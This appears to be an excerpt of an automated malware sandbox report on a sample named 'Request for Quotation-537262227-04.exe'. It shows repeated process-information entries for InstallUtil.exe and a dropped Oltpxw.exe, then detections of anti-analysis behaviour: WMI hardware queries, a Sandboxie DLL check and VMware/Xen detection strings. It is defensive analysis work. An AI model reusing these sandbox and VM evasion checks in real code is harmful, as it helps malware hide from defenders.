                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation-537262227-04.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 2516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 1524, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000280A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2710000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4910000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeMemory allocated: 4D80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2460000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2610000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4610000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: Oltpxw.exe, 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Oltpxw.exe, 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
